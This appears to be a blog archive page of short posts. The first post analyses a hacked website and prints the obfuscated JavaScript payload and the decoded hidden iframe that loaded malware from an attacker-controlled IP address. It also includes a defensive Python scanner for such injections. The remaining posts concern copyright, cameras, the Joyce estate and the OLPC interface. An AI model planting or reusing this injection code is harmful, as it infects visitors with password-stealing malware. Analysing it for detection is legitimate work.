The new malware ecology

Ethan Zuckerman has a fascinating story about how contemporary malware works.

It begins with him Googling a friend to find the URL of her home page, only to find that Google wouldn’t connect him to her site and flashed up the warning “This site may harm your computer”. It transpired that this is the result of the StopBadware campaign run by the folks at the Berkman Center; Google identifies sites that it believes are spreading malware and registers them with Stop Badware. If a site has been blacklisted, its owner has the option of protesting and having his/her case reviewed by the Berkman people. Ethan duly protested on his friend’s behalf…

Within half an hour, three of my colleagues pointed me to the source code of my friend’s page. At the top of her index page was a strange-looking piece of Javascript:

<script language="javascript"> document.write( unescape(
'%3C%69%66%72%61%6D%65%20%73%72%63%3D%20%68
%74%74%70%3A%2F%2F%38%31%2E%39%35%2E%31%34
%36%2E%39%38%2F%69%6E%64%65%78%2E%68%74%6D
%6C%20%66%72%61%6D%65%62%6F%72%64%65%72%3D
%22%30%22%20%77%69%64%74%68%3D%22%31%22%20
%68%65%69%67%68%74%3D%22%31%22%20%73%63%72
%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%6E%61
%6D%65%3D%63%6F%75%6E%74%65%72%3E%3C%2F%69
%66%72%61%6D%65%3E'
) ); </script>

That’s some seriously obfuscated Javascript. But if you translate from hexadecimal to ASCII, the code’s pretty clear – it inserts the following code into the top of the HTML page:

<iframe src= http://81.95.146.98/index.html frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe>

The code opens an “iframe”, an inline frame which allows another web page to be embedded within a page – iframes are pretty useful things, especially for building interactive applications in web pages. But this frame is pretty sinister. It opens a one pixel by one pixel frame which attempts to load the webpage located at http://81.95.146.98/index.html.
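The check Ethan’s colleagues did by hand can be automated. The scanner below is an added example (not code from the original post): it decodes document.write(unescape(...)) payloads the way a browser would and flags iframes that are script-injected, effectively invisible, or pointed at a bare IP address. The sample page is constructed and reuses the payload quoted above.

```python
import re
from urllib.parse import unquote

# Constructed sample page carrying the same percent-encoded payload the post shows.
PAYLOAD = (
    "%3C%69%66%72%61%6D%65%20%73%72%63%3D%20%68%74%74%70%3A%2F%2F%38%31%2E%39%35%2E%31%34"
    "%36%2E%39%38%2F%69%6E%64%65%78%2E%68%74%6D%6C%20%66%72%61%6D%65%62%6F%72%64%65%72%3D"
    "%22%30%22%20%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D%22%31%22%20%73%63%72"
    "%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%6E%61%6D%65%3D%63%6F%75%6E%74%65%72%3E%3C%2F%69"
    "%66%72%61%6D%65%3E")
SAMPLE_HTML = f"""<html><head><script language="javascript"> document.write( unescape(
'{PAYLOAD}'
) ); </script></head><body><p>Welcome.</p>
<iframe src="https://example.org/widget" width="300" height="200"></iframe>
</body></html>"""

WRITE_RE = re.compile(r"document\.write\s*\(\s*unescape\s*\(\s*(['\"])(.*?)\1", re.I | re.S)
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I)
BARE_IP_RE = re.compile(r"^https?://\d{1,3}(?:\.\d{1,3}){3}(?:[:/]|$)")

def js_unescape(s):
    """Mimic JavaScript unescape(): %uXXXX code units first, then %XX bytes (Latin-1)."""
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s, encoding="latin-1")

def decode_unescape_writes(html):
    """Return the markup each document.write(unescape('...')) call would inject."""
    return [js_unescape(m.group(2)) for m in WRITE_RE.finditer(html)]

def _attr(attrs, name):
    # Tolerates unquoted values and whitespace around '=' (as in the injected tag).
    m = re.search(r"\b" + name + r"\s*=\s*[\"']?([^\s\"'>]+)", attrs, re.I)
    return m.group(1) if m else None

def find_suspicious_iframes(html):
    """Scan the page as served plus whatever obfuscated writes would add; each finding
    lists every reason that applied (injected, invisible, bare-IP destination)."""
    sources = [("static", html)] + [("document.write", d) for d in decode_unescape_writes(html)]
    findings = []
    for origin, text in sources:
        for m in IFRAME_RE.finditer(text):
            attrs = m.group(1)
            src = _attr(attrs, "src") or ""
            reasons = []
            if origin != "static":
                reasons.append("injected via document.write(unescape(...))")
            dims = [_attr(attrs, "width"), _attr(attrs, "height")]
            if any(d is not None and d.isdigit() and int(d) <= 1 for d in dims):
                reasons.append("effectively invisible (width or height <= 1px)")
            if BARE_IP_RE.match(src):
                reasons.append("src host is a bare IP address")
            if reasons:
                findings.append({"origin": origin, "src": src, "reasons": reasons})
    return findings
```

Run find_suspicious_iframes over each index page of a site and the legitimate 300x200 widget passes while the injected 1x1 frame is reported with all three reasons.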

That page doesn’t load on my browser – the server is apparently refusing connections, at least from my Macintosh – but it occupies an IP in a block of addresses controlled by a charming bunch of guys who do business as RBusiness Network. Google for them and you’ll mostly find lots of angry message board posts from spamfighters – the RBusiness folks operate a number of servers advertised in spam emails and are suspected of relaying large amounts of spam. Many of the RBusiness-associated webpages are in Russian, though their servers are currently in Panama City, Panama – some antispammers believe that RBusiness is short for “Russian Business Network”, which was evidently their previous operating name.

Googling for the specific IP – 81.95.146.98 – turns up a couple of pages with people documenting an interesting exploit – the Microsoft Data Access Components exploit. Basically, when you load this iframe, it runs a small script which downloads and runs a Windows executable file. That file downloads a rootkit, a password sniffer and opens a backdoor into the user’s system. (Needless to say, this only happens on Microsoft Windows systems running unpatched software… which is to say, many Windows systems.) According to Ivan Macalintal, this iframe was installing code from websites that looked fairly innocuous, including one that promised to help you write your company’s travel policy. (Remarkably, this site is the #1 match for a search for “travel policy” on Google, though Google doesn’t let you click directly to the page, stopping you with a “harm your computer” message.)

It’s possible that this is what my friend’s site was trying to install – Ivan’s report dates from October 2006. It’s also possible that it was trying to install a more recent package of malware – Trojan-PSW.Win32.Small.bs – which Avira saw linked to the 81.95.126.98 domain in early January of this year. This little nasty logs passwords entered on webpages, opens a SOCKS proxy on your machine and calls home to an RBusiness server to let the bad guys know how to take advantage of your new machine to send spams and retrieve your passwords.

So had Ethan’s friend got into bed with these Russian hoodlums? Unlikely.

Simply put, [her site] was hacked. Not content with setting up websites to spread their trojan horses, the RBusiness boys have been breaking into blog and wiki sites and installing this new iframe. In some cases, they’re able to guess default passwords; in other cases, they exploit unpatched bugs in software. I was all ready to go to Berkman yesterday with my tail between my legs and tell my colleagues that my friend’s server had been compromised. But my friends were already dealing with the fact that Google had found malicious iframes on a number of Harvard-affiliated sites, including several blogs hosted on the blogs.law.harvard.edu server! Stop Badware, yesterday at least, was stopping Berkman.

Which is deeply ironic, given what the StopBadware initiative was set up to do. But in a way, it only goes to underscore how complex and dangerous our software monoculture has become.

The absurdity of consistency

Quentin pointed me to this post in The Dilbert Blog. It reads, in part:

One of the most potent forms of persuasion has to do with people’s innate need to be consistent. Studies show that people will ignore logic and information to be consistent. (In other words, we are moist robots.) According to the research, humans are hardwired for consistency over reason. You already knew that: People don’t switch political parties or religions easily. What you didn’t know is how quickly and easily a manipulator can lock someone into a position.

For example, researchers asked people to write essays in support of a random point of view they did not hold. Months later, when surveyed, the majority held the opinion they wrote about, regardless of the topic. Once a person commits an opinion to writing – even an opinion he does not hold – it soon becomes his actual opinion. Not every time, but MOST of the time. The people in these experiments weren’t exposed to new information before writing their contrived opinions. All they did was sit down and write an opinion they didn’t actually have, and months later it became their actual opinion. The experiment worked whether the volunteers were writing the pro or the con position on the random topic.

Most of the truly stupid things done in this world have to do with this consistency principle. For example, once you define yourself as a loyal citizen of Elbonia, you do whatever the King of Elbonia tells you to do, no matter how stupid that is. And your mind invents reasons as to why dying is a perfectly good life strategy.

Right on. I’ve always thought that consistency is a puerile obsession. Oscar Wilde described it as “the last refuge of the unimaginative”. When Maynard Keynes was once accused (I think by a journalist) of changing his mind, he replied, “When the facts change, I change my mind. What do you do, sir?”

And one of the most nauseating aspects of modern British political journalism is the triumphant cry of “U Turn!” that goes up whenever a politician changes his or her mind. It seems to me that U-turns are a sure sign of a sentient, thinking being.

The Dilbert post attracted many idiotic comments, but one stood out from the crowd. It quoted this paragraph from Ralph Waldo Emerson’s essay on Self reliance:

A foolish consistency is the hobgoblin of little minds, adored by little statesmen and philosophers and divines. With consistency a great soul has simply nothing to do. He may as well concern himself with his shadow on the wall. Speak what you think now in hard words, and to-morrow speak what to-morrow thinks in hard words again, though it contradict every thing you said to-day. — ‘Ah, so you shall be sure to be misunderstood.’ — Is it so bad, then, to be misunderstood? Pythagoras was misunderstood, and Socrates, and Jesus, and Luther, and Copernicus, and Galileo, and Newton, and every pure and wise spirit that ever took flesh. To be great is to be misunderstood.

The very model of a modern creative society? I don’t think so

This morning’s Observer column

[Tom] Lehrer is famous for many things, but chief among them is his famous observation that ‘satire died the day Henry Kissinger was awarded the Nobel Peace Prize’. The song of his that I like most is ‘The Elements Song’, in which he recites the names of all the elements of the periodic table at high speed and without fudging a syllable, while at the same time playing a stirring piano accompaniment of what he described as ‘a barely recognisable tune’. It’s an astonishing performance and it resides happily on my iPod.

The other day, I chanced on a link to a lovely piece of Flash animation (see it for yourself here), in which a chap named Mike Stanfill took the Lehrer soundtrack and visually added the names of the elements in a witty – and technically very demanding – way. My first reaction was pure pleasure. My second thought was that this provides a good object lesson for understanding the current debate about intellectual property in a digital age…

Later… Adam Hodgkin pointed out a lovely Lehrer song about the virtues of plagiarism!

Get Rich Slowly

Why this? Only that I liked the site name — Get Rich Slowly. Beats getpoorquickly anyway. Reminds me of Die Broke, a tome which advises that “the last cheque you write should be to the undertaker — and it should bounce”!

Oh — by the way: the domain getpoorquickly.com is available! Form an orderly queue…

Still movies

Further to my reflections on getting movies from digital still cameras, here’s an example of the way the boundaries between devices are blurring. My Canon IXUS, like many compact digital cameras, has a movie mode. If you use it to record movie clips, then iPhoto neatly collects them and keeps them in its library, where they’re stored as .avi files. Double-click on a movie clip and OS X launches QuickTime Player, enabling one to view the clip.

So far so good. But if you launch iMovieHD then you can drag .avi clips from the iPhoto library onto the editing timeline. The software converts them to DV on the fly. (In the old days, you had to open them in QuickTime Pro and convert them to DV files, but now it all seems to be built into iMovieHD.)

I’ve just tested this by making a complete little film from movie clips and images taken using the IXUS in Provence last year. It was as easy as pie. I’d post it to YouTube were it not for the fact that the soundtrack is from a Leo Kottke album and therefore not my property.

I’m sure you can do all this using Windows, but I’ll bet the tools aren’t as integrated as they are on OS X.

I should also add that it was Quentin who, unwittingly, started me off on this line of thought. He too has an IXUS.

Joyce aggression finally halted

Hooray! Stephen Joyce, the maniacal enforcer of the James Joyce estate, has finally met his match. His nemesis: one Lawrence Lessig. Here’s the report from Stanford Law.

Last June we sued the Estate of James Joyce to establish the right of Stanford Professor Carol Shloss to use copyrighted materials in connection with her scholarly biography of Lucia Joyce. Shloss suffered more than ten years of threats and intimidation by Stephen James Joyce, who purported to prohibit her from quoting from anything that James or Lucia Joyce ever wrote for any purpose. As a result of these threats, significant portions of source material were deleted from Shloss’s book, Lucia Joyce: To Dance In The Wake.

In the lawsuits we filed against the Estate and against Stephen Joyce individually, we asked the Court to remove the threat of liability by declaring Shloss’s right to publish those deleted materials on a website designed to supplement the book. After trying to have the case dismissed for lack of subject matter jurisdiction, the Estate gave up the fight. Joyce and the Estate have now entered into a settlement agreement enforceable by the Court that prohibits them from enforcing any of their copyrights against Shloss in connection with the publication of the supplement, whether in electronic or printed form. (The Settlement Agreement is posted here.)

This is a remarkable victory given the Estate’s past aggression. But more are needed in order to make clear and concrete the protections that Fair Use is intended to protect in theory. We hope this is the first in a string of many cases that vindicate the rights of not only scholars and academics, but creators of all manner.

Official press release here.

Harvard dropout makes good

From MercuryNews.com

CAMBRIDGE, Mass. – Bill Gates is finally getting his Harvard degree — 32 years after he walked away from the university on the path to becoming the world’s wealthiest person.
Gates, billionaire co-founder of Microsoft Corp., philanthropist and college dropout, will receive an honorary degree June 7 when he delivers Harvard University’s 356th commencement address.

“His contributions to the world of business and technology, and the great example he has set through his far-reaching philanthropy, will rightfully put him on center stage in Harvard Yard,” Harvard Alumni Association President Paul Finnegan said in a statement.

Movies without a movie camera

Hmmm… From an Apple QuickTime marketing message:

The pocket-sized, innovative Casio EXILIM HI-ZOOM EX-V7 is currently the world’s slimmest digital camera with a 7X optical zoom lens. More than just a still camera, it also records widescreen, next-generation, high-quality H.264 movies — at remarkably small file sizes — with movie stabilizer technology that minimizes the effects of hand movement while filming. You can record up to three hours of video using a 2GB memory card.

If true, why bother carrying a camcorder? Current price: £279 from here.

OLPC: rethinking the user interface

The folks working on the One Laptop Per Child project have decided that they need to rethink the user interface to take into account the needs of the kids who are its target users. “The desktop metaphor is so entrenched in personal computer users’ collective consciousness”, they write,

that it is easy to forget what a bold and radical innovation the GUI was and how it helped free the computer from the “professionals” who were appalled at the idea of computing for everyone.

OLPC is about to shake up things once more.

Beginning with Papert’s simple observation that children are knowledge workers like any adult, only more so, we decided they needed a user-interface tailored to their specific type of knowledge work: learning. So, working together with teams from Pentagram and Red Hat, we created SUGAR, a “zoom” interface that graphically captures their world of fellow learners and teachers as collaborators, emphasizing the connections within the community, among people, and their activities.

Looking at the design principles underpinning the new interface it’s clear that the team are indeed embarking on a radical re-think. Michael got SUGAR running on Ndiyo terminals (see picture)…

… and although we can’t obviously replicate the mesh-networking facility that’s built into the OLPC laptop, we’ve been able to play with the software. It’s fascinating to be forced to unlearn the desktop metaphor that we’ve all absorbed since the Xerox days.